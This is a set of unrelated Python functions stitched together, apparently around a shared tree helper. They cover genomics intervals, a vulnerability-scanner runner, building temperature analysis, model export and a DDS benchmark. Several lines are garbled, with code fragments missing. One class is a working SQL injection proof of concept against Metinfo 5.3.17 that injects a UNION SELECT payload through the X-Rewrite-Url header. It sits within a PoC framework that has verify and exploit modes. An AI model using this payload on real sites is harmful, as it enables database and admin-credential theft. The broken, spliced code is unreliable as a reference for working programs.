def readIntervals(FILE, STRAND, single=False, merge=False, interval=None, pad=(0, 0)): FH = open(FILE) D = {"+": {}, "-": {}} lines = FH.readlines() for i, line in enumerate(lines): lineArray = line.strip("\n").split("\t") assert len( lineArray ) == 5, "strand\tchrom\tstart\t\stop\tname(ID)\n format please..." strand, chrom, start, stop, name = lineArray if strand not in D: D[strand] = {} if chrom not in D[strand]: D[strand][chrom] = list() D[strand][chrom].append((int(start), int(stop), name)) #sort for strand in D: for chrom in D[strand]: N = len(D[strand][chrom]) size = N / 50. D[strand][chrom].sort() if interval is not None: start, stop = size * interval, size * (interval + 1) D[strand][chrom] = [ d for i, d in enumerate(D[strand][chrom]) if start <= i <= stop ] if single: D[strand][chrom] =[strand][chrom]) elif merge: D[strand][chrom] = isolate_overlaps.merge(D[strand][chrom]) else: D[strand][chrom] = D[strand][chrom] if STRAND == "-": D[strand][chrom] = [(start - pad[1], stop + pad[0], name) for start, stop, name in D[strand][chrom]] else: D[strand][chrom] = [(start - pad[0], stop + pad[1], name) for start, stop, name in D[strand][chrom]] D[strand][chrom] = utils.tree(D[strand][chrom]) if STRAND not in D: print "user specified strand is not present in annotation file" D = None return D
def start(self): task = self.task_queue.get(block=False) # [target, (vid1, [name1, class1])] target = task[0] poc_vid = task[1][0] poc_name = task[1][1][0].split(".")[-1] poc = task[1][1][1]() poc.scan_info = { 'TaskId': self.task_id, 'Target': target, 'Verbose': self.verbose, 'Error': '', 'Mode': self.mode, 'Success': False, 'Ret': tree(), "risk_category": poc.scan_info.get('risk_category', '') } poc.poc_info["poc"]["Class"] = task[1][1][1].__name__ timeout = Timeout(self.fb.poc_setting.timeout) timeout.start() try:"{} - {} start...".format(poc_vid, target))"{} - {} finish.".format(poc_vid, target)) except Timeout: poc.scan_info['Error'] = "PoC run timeout." poc.scan_info['Success'] = False log.error("{} - {} error: PoC run timeout.".format( poc_vid, target)) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e: poc.scan_info['Error'] = str(e) poc.scan_info['Success'] = False log.error("{} - {} error: {}.".format(poc_vid, target, e)) except Exception: import traceback err = traceback.format_exc() poc.scan_info['Error'] = err poc.scan_info['Success'] = False log.error("{} - {} error: {}.".format(poc_vid, target, err)) finally: timeout.cancel() if not poc.scan_info.get("Success", False): return if self.fb.poc_setting.return_resp: poc.scan_info["req_resp"] = self._get_http_data(poc_vid, target) self.result.put_nowait([poc_name, poc.poc_info, poc.scan_info])
def analysis(project_data_dict): suggestion_return = [] for project_name in project_data_dict.keys(): payload = { "entityId": project_data_dict[project_name]["entityId"], "projectName": project_name, "dateTime": str("%Y-%m-%d %H:%M:%S")) } df = pd.read_json(json.dumps(project_data_dict[project_name]["data"])) df.set_index('locIds', inplace=True) df["tp_average_np"] = df.apply(lambda x: np.array( [x.tp_average_7, x.tp_average_1, x.tp_average_2]), axis=1) print(df) suggestion_list = [] room_tree = tree() # 创建树结构 for i in list(df.index): room_tree[json.loads(i)[0]][json.loads(i)[1]][json.loads(i)[2]] room_tree = dicts(room_tree) # 树结构转换为普通字典结构 for i in list(df.index): # 树结构下每个value变成({locId:}, [平均值])的形式,room room_tree[json.loads(i)[0]][json.loads(i)[1]][json.loads( i)[2]] = df.tp_average_np[i] suggestion_list.append( {json.loads(i)[2]: judge_room(df.tp_average_np[i][1])}) # 根据前一天的平均温度判断房间是否存在问题 sum_building = 0 num = 0 for k, i in zip(room_tree.keys(), room_tree.values()): # building for j in i.keys(): # floor sum_building += np.sum(list(i[j].values()), axis=0) num += len(list(i[j].values())) i[j] = (i[j], np.average(list(i[j].values()), axis=0)) suggestion_list.append( {j: judge_floor(i[j][1][1], list(i.keys()))}) room_tree[k] = (room_tree[k], sum_building / num) suggestion_list.append({ k: judge_building(room_tree[k][1][1], list(room_tree.keys())) }) payload["suggestion"] = suggestion_list suggestion_return.append(payload) return suggestion_return
async def alert_init(client): plugins = [(handler.user_callback if hasattr(handler, 'user_callback') else handler.callback) for group in client.dispatcher.groups.values() for handler in group] plugins_count = len(plugins) plugins_names = [] for plugin_callback in plugins: members = { key: value for key, value in inspect.getmembers(plugin_callback) } full_name = f"{members['__globals__']['__name__']}.{members['__name__']}" plugins_names.append(full_name) plugins_text = utils.tree(utils.parse_tree(plugins_names)) started_text = config.langs.start_log(plugins_count=plugins_count, plugins_names=plugins_names, plugins_text=plugins_text, client=client) await client.send_message(logs_chat, started_text)
def main(): image_path, weights_dir = download_demo() # Example of weights directory structure """ dir: ./data/unet-lemon-kiwi ├── └── config.json """ print(f"Weights dir: {weights_dir}") for line in tree(Path(weights_dir)): print(line) # use one of: #device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") #device = torch.device('cuda:0') device = torch.device('cpu') # load model input resolution and the list of output classes model_config_path = os.path.join(weights_dir, "config.json") with open(model_config_path) as f: model_config = json.load(f) num_output_classes = len(model_config["class_title_to_idx"]) # construct model graph model = construct_unet(n_cls=num_output_classes) weights_path = os.path.join(weights_dir, "") #load model as DataParallel, can be used only on GPU #model = DataParallel(model).cuda() #model.load_state_dict(torch.load(weights_path, map_location=device)) # convert weights from DataParallel to generic format generic_weights_path = os.path.join(weights_dir, "") if sly.fs.file_exists(generic_weights_path) is False: convert_weights_to_generic_format(model, weights_path, generic_weights_path) # model can be used both on CPU or GPU model = construct_unet(n_cls=num_output_classes) model.load_state_dict(torch.load(generic_weights_path, map_location=device)) # model to device and and set to inference mode model.eval() # inference on image image = cv2.imread(image_path, cv2.IMREAD_COLOR) image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) results, output_model_raw = predict(device, model, model_config, image) for class_name, class_mask in results.items(): cv2.imwrite(os.path.join(data_dir, f"{class_name}.png"), class_mask) # convert to ONNX format device = torch.device('cpu') model.eval() onnx_weights_path = os.path.join(weights_dir, "model.onnx") #sly.fs.silent_remove(onnx_weights_path) # ONLY FOR DEBUG if sly.fs.file_exists(onnx_weights_path) is False: inp = to_model_input(model_config, image) torch.onnx.export( model, inp, onnx_weights_path, opset_version=11, export_params=True, do_constant_folding=True, input_names=['input'], output_names=['output'], dynamic_axes={ 'input': { 0: 'batch_size' }, # variable lenght axes 'output': { 0: 'batch_size' } }) # verify onnx model import onnx onnx_model = onnx.load(onnx_weights_path) onnx.checker.check_model(onnx_model) # test onnx model import onnxruntime ort_session = onnxruntime.InferenceSession(onnx_weights_path) def to_numpy(tensor): return tensor.detach().cpu().numpy( ) if tensor.requires_grad else tensor.cpu().numpy() # compute ONNX Runtime output prediction x = to_model_input(model_config, image) ort_inputs = {ort_session.get_inputs()[0].name: to_numpy(x)} ort_outs =, ort_inputs) # compare ONNX Runtime and PyTorch results np.testing.assert_allclose(to_numpy(output_model_raw), ort_outs[0], rtol=1e-03, atol=1e-05)
def _handle_list_files(params): root = Path.home().joinpath('Desktop') if len(params) > 0 and Path(params[0]).is_dir(): root = Path(params[0]) res = f'List of files rooted at {root} :-\n' return res + '\n'.join([line for line in utils.tree(root)])
class BasePoc: poc_info = { 'poc': { 'Id': None, # poc编号,命名规范为vb_2014_0001_*.py 'vbid': None, # vulbox id 'Name': None, # poc名称 'Author': None, # poc作者 'Create_date': None, # poc创建时间:如'2014-11-19' }, # to be edited by you 'vul': { 'Product': None, # 漏洞所在产品名称 'Version': None, # 产品的版本号 'Type': None, # 漏洞类型 'Severity': None, # Bug severity 'Description': None, # 漏洞介绍 'DisclosureDate': None, # poc公布时间:如'2014-11-19' } } # 用于开始检测前的初始化(target, mode, verbose) # 和检测结束后的结果保存(Error,Success,Ret) # 额外的输出信息以dict形式保存在Ret中 # to be updated by verify or exploits scan_info = { 'Target': '', # 目标网站域名 'TaskId': '', 'Mode': 'verify', # verify或exploit, 默认值为verify 'Verbose': False, # 是否打印详细信息,默认值为False 'Error': '', # 记录poc失败信息 'Success': False, # 是否执行成功,默认值为False表示poc执行不成功,若成功请更新该值为True 'Ret': utils.tree() # 记录额外的poc相关信息 } # 用于测试脚本需要数据的存储 # test_case = { 'Need_fb': False, # 是否需要上层数据或者测试数据不宜构建, False不进行测试 'Vuln': [], # 可通过此PoC进行验证的测试目标 'Not_vuln': [] # 不能通过此PoC进行验证的测试目标 } def __init__(self): pass def verify(self, first=False, *args, **kwargs): pass def exploit(self, first=False, *args, **kwargs): pass def run(self, first=False, fb=None, **kwargs): = self.scan_info['Target'] self.mode = self.scan_info['Mode'] self.verbose = self.scan_info['Verbose'] self.fb = fb if self.mode == 'verify': self.verify(first=first, **kwargs) elif self.mode == 'exploit': self.exploit(first=first, **kwargs) # call it to test POC def run_test(self): pass
class MetinfoXRewriteurlSQLInjection(BasePoc): # PoC实现类,需继承BasePoc # 为PoC填充poc_info、scan_info、test_case三个字典中的基本信息 poc_info = { 'poc': { 'Id': 'vb_2017_0060', # PoC的VID编号 'vbid': '', 'Name': 'Metinfo 5.3.17 X-Rewrite-url SQL Injection', # PoC名称 'Author': 'ice.liao', # PoC作者 'Create_date': '2017-08-15', # PoC创建时间 }, 'vul': { 'Product': 'Metinfo', # 漏洞所在产品名称 'Version': '5.3.17', # 产品的版本号 'Type': 'SQL Injection', # 漏洞类型 'Severity': 'critical', # 漏洞危害等级low/medium/high/critical 'isWeb' : True, # 是否Web漏洞 'Description': ''' MetInfo是中国长沙米拓信息技术有限公司的一套使用PHP和Mysql开发的内容管理系统(CMS) 危害: 网站数据库信息可造成泄漏,管理员密码可被远程攻击者获得 修复建议: 前往下载最新版本 ''', # 漏洞简要描述 'DisclosureDate': '2017-08-11', # PoC公布时间 } } # scan_info信息可以保持默认,相关参数如target/mode/verbose在TCC框架中都可以通过命令行参数设置 scan_info = { 'Target': '', # 目标网站域名 'Mode': 'verify', # verify或exploit 'Verbose': True, # 是否打印详细信息 'Error': '', # 检测失败时可用于记录相关信息 'Success': False, # 是否检出漏洞,若检出请更新该值为True 'risk_category': 'sec_vul', 'Ret': tree() # 可用于记录额外的一些信息 } test_case = { 'Need_fb': False, 'Vuln': [], # 列表格式的测试URL 'Not_vuln': [], # 同上 } def verify(self, first=False): # 漏洞验证方法(mode=verify) target = self.scan_info.get("Target", "") # 获取测试目标 verbose = self.scan_info.get("Verbose", False) # 是否打印详细信息 # 以下是PoC的检测逻辑 url = urljoin(target,'index.php?lang=Cn&index=1') payload = "1/2/zxxza' union select 1,2,3,md5(0x11),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#/index.php" headers = { "X-Rewrite-Url": payload } location = "" # 使用req做HTTP请求的发送和响应的处理,req是TCC框架将requests的HTTP请求方法封装成统一的req函数,使用req(url, method, **kwargs),参数传递同requests resp = req(url, 'get', headers=headers, allow_redirects=False) if resp is not None: location = resp.headers.get("Location", "") if "47ed733b8d10be225eceba344d533586" in location: self.scan_info['Success'] = True # 漏洞存在,必须将该字段更新为True(必须) self.scan_info['Ret']['VerifyInfo']['URL'] = url # 记录漏洞相关的一些额外信息(可选) self.scan_info['Ret']['VerifyInfo']['DATA'] = "X-Rewrite-Url:" + payload if verbose: highlight('[*] Metinfo 5.3.17 X-Rewrite-url SQL Injection found') # 打印高亮信息发现漏洞,其他可用方法包括info()/warn()/error()/highlight()方法分别打印不同等级的信息 def exploit(self, first=False): # 漏洞利用方法(mode=verify) self.verify(first=first)
def pingpong(o): texec = [] ping = 'ping' pong = 'pong' if sys.platform == 'win32': ping = 'ping.exe' pong = 'pong.exe' apiselect=0 if o.capi: #C texec.append([]) texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/c/' + ping) texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/c/' + pong) texec[apiselect].append('C') apiselect+=1 if o.cppapi: #SACPP texec.append([]) texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/cpp/' + ping) texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/cpp/' + pong) texec[apiselect].append('SACPP') apiselect+=1 if o.isoapi: #ISOCPP texec.append([]) texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/isocpp/' + ping) texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/isocpp/' + pong) texec[apiselect].append('ISOCPP') apiselect+=1 ''' Create or append to total averages file ''' tafcsv = utils.getCSV(o.averagesfile) #Create nested dictionary results = utils.tree() for i in texec: resultsApi = results[i[2]] #1KB Bsize = 1000 try: if o.pongonly: pong = subprocess.Popen([i[1]],stdout=subprocess.PIPE, stderr=subprocess.PIPE) utils.setPriority(, o.pongnice, o.pongaffinity) if o.pongonly and not o.pingonly: #Run for 10 minutes and exit program time.sleep(600) sys.exit(0) time.sleep(1) ''' Set the CSV output file (af) ''' csvfile = i[0] + ".csv" cw = utils.getCSV(csvfile) cw.writerow([str(time.strftime("%x %H:%M:%S"))]) try: while(Bsize <= (o.maxpayload * 1000)): resultsBsize = resultsApi[int(Bsize)] print "launching " + i[0] + "with args:" + str(Bsize) + " " + str(o.samples) + " " + str(o.seconds) cw.writerow([str(Bsize/1000)+"KB"]) cw.writerow(['Seconds'] + ['RT Count'] + ['RT median'] + ['RT min'] + ['W Count'] + ['W median'] + ['W min'] + ['R Count'] + ['R mean'] + ['R min']); try: if o.pingonly: ping = subprocess.Popen( [i[0], str(Bsize), str(o.samples), str(o.seconds) ], stdout=subprocess.PIPE, stderr=subprocess.PIPE) utils.setPriority(, o.pingnice, o.pingaffinity) except OSError: print "Cannot find ping executable: " + str([i[0]]) #Wait for ping to terminate ping.wait() for line in ping.stderr: print 'err: ' + line for line in ping.stdout: utils.parseRT(line,resultsBsize) for key in sorted(resultsBsize): k = resultsBsize[key] cw.writerow([key] + [k['RoundTrip']['Count']] + [k['RoundTrip']['Median']] + [k['RoundTrip']['Min']] + [k['Read']['Count']] + [k['Read']['Median']] + [k['Read']['Min']] + [k['Write']['Count']] + [k['Write']['Median']] + [k['Write']['Min']]) Bsize = Bsize*2 except OSError: print "Cannot find ping executable: " + [i[0]] finally: if o.pongonly: #Quit pong pingq = subprocess.Popen( [i[0], 'quit' ], stdout=subprocess.PIPE, stderr=subprocess.PIPE) pingq.wait() for line in zip(pingq.stdout, pingq.stderr): print line pong.terminate() except OSError: print "Cannot find pong executable: " + str([i[1]]) tafcsv.writerow([str(time.strftime("%x %H:%M:%S"))]) tafcsv.writerow(['Payload KB'] + ['RoundTrip C'] + ['RoundTrip SACPP'] + ['RoundTip ISOCPP'] + ['Read C'] + ['Read SACPP'] + ['Read ISOCPP'] + ['Write C'] + ['Write SACPP'] + ['Write ISOCPP']) Bsize = 1000 while Bsize <= (o.maxpayload * 1000): KB = Bsize/1000 #pdb.set_trace() tafcsv.writerow([KB] + utils.is_empty(results['C'][Bsize]['Overall']['RoundTrip']['Median']) + utils.is_empty(results['SACPP'][Bsize]['Overall']['RoundTrip']['Median']) + utils.is_empty(results['ISOCPP'][Bsize]['Overall']['RoundTrip']['Median']) + utils.is_empty(results['C'][Bsize]['Overall']['Read']['Median']) + utils.is_empty(results['SACPP'][Bsize]['Overall']['Read']['Median']) + utils.is_empty(results['ISOCPP'][Bsize]['Overall']['Read']['Median']) + utils.is_empty(results['C'][Bsize]['Overall']['Write']['Median']) + utils.is_empty(results['SACPP'][Bsize]['Overall']['Write']['Median']) + utils.is_empty(results['ISOCPP'][Bsize]['Overall']['Write']['Median'])) Bsize = Bsize*2